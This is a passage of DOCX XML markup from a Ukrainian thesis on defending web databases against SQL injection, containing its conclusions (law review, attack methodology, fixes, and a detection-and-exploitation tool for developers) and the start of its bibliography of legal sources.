          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc516752165"/>
      <w:bookmarkStart w:id="133" w:name="_Toc30433163"/>
      <w:r w:rsidRPr="00273246">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ВИСНОВК</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="49970999" w14:textId="77777777" w:rsidR="0072630A" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425820CD" w14:textId="77777777" w:rsidR="0072630A" w:rsidRPr="00273246" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EF39BB" w14:textId="77777777" w:rsidR="0072630A" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким чином, захист баз даних від </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00651BAD">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>є одним із пріоритетних напрямків розвитку веб</w:t>
      </w:r>
      <w:r w:rsidRPr="00651BAD">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>програмування</w:t>
      </w:r>
      <w:r w:rsidRPr="00651BAD">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оскільки роль сайтів та їх вплив на бізнес постійно зростає, відповідно щоденно збільшується кількість сайтів і веб-додатків, які використовують бази даних для зберігання масивної кількості інформації і конфіденційних даних, які приваблюють кіберзлочинців. І тому постійно розробляються нові методи для захисту веб-додатків від </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6669">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6669">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>атак.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6669">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Кіберзлочинці у свою чергу розробляють нові методи для того щоб обійти систему захисту, або користуються відомими вразливостями у незахищеному веб-додатку, або сайту.  Виходячи з вище сказаного, стає зрозуміло, що БД відіграє одну з найважливіших ролей в розвитку інтернет бізнесу, а отже питання захисту БД від </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="0013306F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>стає більш актуальною.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79868BEE" w14:textId="6B2D882C" w:rsidR="0072630A" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В роботі розглядаються як за допомогою </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="003E2F64">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">можна отримати конфіденційні дані з вразливого додатку і користуватися </w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>веб-додатком</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, що був </w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>розроблений і</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> який допоможе розробникам їх виявляти і робити продукт більш якісним. Під час виконання даної роботи було проаналізовано закони та правові акти використання БД в Українському та Міжнародному законодавстві.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B310DD" w14:textId="77777777" w:rsidR="0072630A" w:rsidRPr="005F1297" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Наступним етапом було досліджено самі </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Розроблення методів та систем безпеки неможливо без розуміння проведення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, до якої будуть застосовано ці методи. Саме тому було розглянуто види та проаналізовано методологію проведення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та методи атак, які можуть загрожувати конфіденційності, цілісності та доступності інформації на сайтах та у веб-додатках і до чого вони можуть призвести. На кінець було розглянуто способи та рекомендації по усуненню </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259ABB3D" w14:textId="2F58381C" w:rsidR="0072630A" w:rsidRPr="005F1297" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Останнім етапом було розроблено </w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>зручний інструмент з веб інтерфейсом</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, який</w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> допомагає</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> вияв</w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ити</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">у веб-додатку і </w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">допомагає в їх </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експлуат</w:t>
      </w:r>
      <w:r w:rsidR="005240D2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ації</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, показуючи розробникам чим вони небезпечні</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> тим самим </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>мотивуючи їх створювати більш безпечні додатки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211852AD" w14:textId="3C0DDB8B" w:rsidR="0072630A" w:rsidRPr="0072630A" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1297">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB26FB6" w14:textId="3764F64A" w:rsidR="0072630A" w:rsidRPr="005240D2" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc514930792"/>
      <w:bookmarkStart w:id="135" w:name="_Toc516752166"/>
      <w:bookmarkStart w:id="136" w:name="_Toc30433164"/>
      <w:r w:rsidRPr="005240D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>СПИСОК БІБЛІОГРАФІЧНИХ ПОСИЛАНЬ ВИКОРИСТАНИХ ДЖЕРЕЛ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="043526DA" w14:textId="5DA2312E" w:rsidR="00C77A4D" w:rsidRDefault="00C77A4D" w:rsidP="00A31C28">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32459405" w14:textId="77777777" w:rsidR="00A31C28" w:rsidRPr="00A31C28" w:rsidRDefault="00A31C28" w:rsidP="00A31C28">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DBDE22" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>База данных [Електронний ресурс] /Портал: URL: http://lib.mdpu.org.ua/e-book/vstup/L5.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E596D7" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Литвин С. Й. Правове регулювання відносин щодо компіляції даних (бази даних) в міжнародно-правових актах та законодавстві ЄС </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8A3CE" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Бернські конвенції. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E10C651" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Угода про торговельні аспекти права інтелектуальної власності</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494D8E9" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Council Directive on the legal protection of databases 1996 II Official Journal of the EC. L. 77. </w:t>
      </w:r>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>March 27, 1996. – P. 20 et seq.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D52210E" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эдельман Б. Мысли об авторском праве и путях его развития в странах ЕЭС // Бюллетень по авторскому праву. – 1994. – Т. XXVII. – С. 16–17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB220D" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Бентли Л., Шерман Б. Право интеллектуальнойсобственности: Авторское право. – С. 523. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E63240" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sui</w:t>
      </w:r>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>generis</w:t>
      </w:r>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">»[Електронний ресурс] режим доступу: http://ru.wiktionary.org/wiki/sui_generis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B229FCE" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Эдельман Б. Вказана праця. – С. 18. </w:t>
      </w:r>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59AAE0" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  Директива 96/9/ЄС Європейського парламенту та ради «Про правовий захист баз даних» від 11 березня 1996 [Електронний ресурс] режим доступу: http://zakon1.rada.gov.ua/laws/show/994_241</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD5C1E" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ищенко Е. А. Защита персональных данных в праве Европейского Союза //«Российское право в Интернете». Номер 2009 (01)// http://rpi.msal.ru/prints/200901ishenko.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3D7C4" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
